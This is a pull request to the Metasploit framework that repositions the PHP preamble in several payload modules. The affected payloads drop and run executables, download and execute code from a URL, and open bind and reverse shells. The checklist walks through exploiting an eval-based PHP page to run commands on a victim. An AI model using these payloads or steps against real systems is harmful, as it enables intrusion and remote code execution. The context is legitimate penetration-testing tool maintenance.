### PR TITLE
Fix a bug where PHP tags were in the wrong place

### DIFF
--- a/lib/msf/core/exploit/php_exe.rb
+++ b/lib/msf/core/exploit/php_exe.rb
@@ -52,14 +52,13 @@ module Exploit::PhpEXE
       end
       p = Rex::Text.encode_base64(generate_payload_exe)
       php = %Q{
-      error_reporting(0);
+      #{php_preamble}
       $ex = "#{bin_name}";
       $f = fopen($ex, "wb");
       fwrite($f, base64_decode("#{p}"));
       fclose($f);
       chmod($ex, 0777);
       function my_cmd($cmd) {
-      #{php_preamble}
       #{php_system_block};
       }
       if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {

--- a/lib/msf/core/payload/php.rb
+++ b/lib/msf/core/payload/php.rb
@@ -26,6 +26,7 @@ module Msf::Payload::Php
     # Canonicalize the list of disabled functions to facilitate choosing a
     # system-like function later.
     preamble = "/*<?php /**/
+      @error_reporting(0);
       @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
       #{dis}=@ini_get('disable_functions');
       if(!empty(#{dis})){

--- a/lib/msf/core/payload/php/bind_tcp.rb
+++ b/lib/msf/core/payload/php/bind_tcp.rb
@@ -86,7 +86,7 @@ if (!$s) { die(); }
 
     php << php_send_uuid if include_send_uuid
 
-    php << %Q^switch ($s_type) { 
+    php << %Q^switch ($s_type) {
 case 'stream': $len = fread($s, 4); break;
 case 'socket': $len = socket_read($s, 4); break;
 }

--- a/modules/payloads/singles/php/bind_php.rb
+++ b/modules/payloads/singles/php/bind_php.rb
@@ -43,7 +43,7 @@ module MetasploitModule
 
     dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);
     shell = <<-END_OF_PHP_CODE
-    #{php_preamble({:disabled_varname => dis})}
+    #{php_preamble(disabled_varname: dis)}
     $port=#{datastore['LPORT']};
 
     $scl='socket_create_listen';

--- a/modules/payloads/singles/php/download_exec.rb
+++ b/modules/payloads/singles/php/download_exec.rb
@@ -40,6 +40,7 @@ module MetasploitModule
     exename = Rex::Text.rand_text_alpha(rand(8) + 4)
     dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
     shell = <<-END_OF_PHP_CODE
+    #{php_preamble({:disabled_varname => dis})}
     if (!function_exists('sys_get_temp_dir')) {
       function sys_get_temp_dir() {
         if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
@@ -63,7 +64,6 @@ module MetasploitModule
     fclose($fd_out);
     chmod($fname, 0777);
     $c = $fname;
-    #{php_preamble({:disabled_varname => dis})}
     #{php_system_block({:cmd_varname => "$c", :disabled_varname => dis})}
     @unlink($fname);
     END_OF_PHP_CODE

--- a/modules/payloads/singles/php/download_exec.rb
+++ b/modules/payloads/singles/php/download_exec.rb
@@ -40,7 +40,7 @@ module MetasploitModule
     exename = Rex::Text.rand_text_alpha(rand(8) + 4)
     dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
     shell = <<-END_OF_PHP_CODE
-    #{php_preamble({:disabled_varname => dis})}
+    #{php_preamble(disabled_varname: dis)}
     if (!function_exists('sys_get_temp_dir')) {
       function sys_get_temp_dir() {
         if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
@@ -64,7 +64,7 @@ module MetasploitModule
     fclose($fd_out);
     chmod($fname, 0777);
     $c = $fname;
-    #{php_system_block({:cmd_varname => "$c", :disabled_varname => dis})}
+    #{php_system_block(cmd_varname: "$c", disabled_varnam: dis)}
     @unlink($fname);
     END_OF_PHP_CODE
 

--- a/modules/payloads/singles/php/download_exec.rb
+++ b/modules/payloads/singles/php/download_exec.rb
@@ -56,7 +56,9 @@ module MetasploitModule
     }
     $fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "#{exename}.exe";
     $fd_in = fopen("#{datastore['URL']}", "rb");
+    if ($fd_in === false) { die(); }
     $fd_out = fopen($fname, "wb");
+    if ($fd_out === false) { die(); }
     while (!feof($fd_in)) {
       fwrite($fd_out, fread($fd_in, 8192));
     }

--- a/modules/payloads/singles/php/exec.rb
+++ b/modules/payloads/singles/php/exec.rb
@@ -37,9 +37,9 @@ module MetasploitModule
     cmd = Rex::Text.encode_base64(datastore['CMD'])
     dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
     shell = <<-END_OF_PHP_CODE
+    #{php_preamble(disabled_varname: dis)}
     $c = base64_decode("#{cmd}");
-    #{php_preamble({:disabled_varname => dis})}
-    #{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis})}
+    #{php_system_block(cmd_varname: "$c", disabled_varname: dis)}
     END_OF_PHP_CODE
 
     return Rex::Text.compress(shell)

--- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
@@ -38,7 +38,7 @@ module MetasploitModule
 
     uuid = generate_payload_uuid
     bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
-    met = met.sub("\"PAYLOAD_UUID\", \"\"", "\"PAYLOAD_UUID\", \"#{bytes}\"")
+    met = met.sub(%q|"PAYLOAD_UUID", ""|, %Q|"PAYLOAD_UUID", "#{bytes}"|)
 
     met.gsub!(/#.*$/, '')
     met = Rex::Text.compress(met)

--- a/modules/payloads/singles/php/reverse_php.rb
+++ b/modules/payloads/singles/php/reverse_php.rb
@@ -66,12 +66,12 @@ module MetasploitModule
     shell=<<-END_OF_PHP_CODE
     $ipaddr='#{ipaddr}';
     $port=#{port};
-    #{php_preamble({:disabled_varname => "$dis"})}
+    #{php_preamble(disabled_varname: "$dis")}
 
     if(!function_exists('#{exec_funcname}')){
       function #{exec_funcname}($c){
         global $dis;
-        #{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})}
+        #{php_system_block(cmd_varname: "$c", disabled_varname: "$dis", output_varname: "$o")}
         return $o;
       }
     }

--- a/modules/payloads/singles/php/shell_findsock.rb
+++ b/modules/payloads/singles/php/shell_findsock.rb
@@ -50,13 +50,12 @@ module MetasploitModule
     var_fd  = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
     var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
     shell = <<END_OF_PHP_CODE
-error_reporting(0);
+#{php_preamble}
 print("<html><body>");
 flush();
 
 function mysystem(#{var_cmd}){
-  #{php_preamble()}
-  #{php_system_block({:cmd_varname=>var_cmd, :output_varname => var_out})}
+  #{php_system_block(cmd_varname: var_cmd, output_varname: var_out)}
   return #{var_out};
 }
 


### PR DESCRIPTION
As reported by mdisec in `#metasploit`, the php preamble code containing the `<?php` tags was not in the right place for some payloads. This PR pushes it to the top of those payloads.

## Verification

- [x] have a vulnerable php script, something like this: `<?php eval($_GET['evalme']);`
- [x] `use exploit/unix/webapp/php_eval`
* Exec
- [x] `set PAYLOAD php/exec`
- [x] set URIPATH to the right path to reach your vulnerable script (with `!CODE!` in the vulnerable parameter)
- [x] `set CMD echo php sucks > /tmp/foo`
- [x] `run`
- [x] **Verify** /tmp/foo exists on the victim
* Download exec
- [x] `set PAYLOAD php/download_exec`
- [x] set URIPATH to the right path to reach your vulnerable script (with `!CODE!` in the vulnerable parameter)
- [x] `set URL` to a full URL to an executable file for the target system.  I used a python bind stager (don't forget to add the `#!/usr/bin/env python` line to the top if you do this).
- [x] `run`
- [x] **Verify** Your executable is downloaded and runs
* Bind shell, single
- [x] `set PAYLOAD php/bind_php`
- [x] `set LPORT` appropriately
- [x] `run`
- [x] **Verify** working shell
* Bind meterp, stager
- [x] `set PAYLOAD php/meterpreter/bind_tcp`
- [x] `set LPORT` appropriately
- [x] `run`
- [x] **Verify** working shell


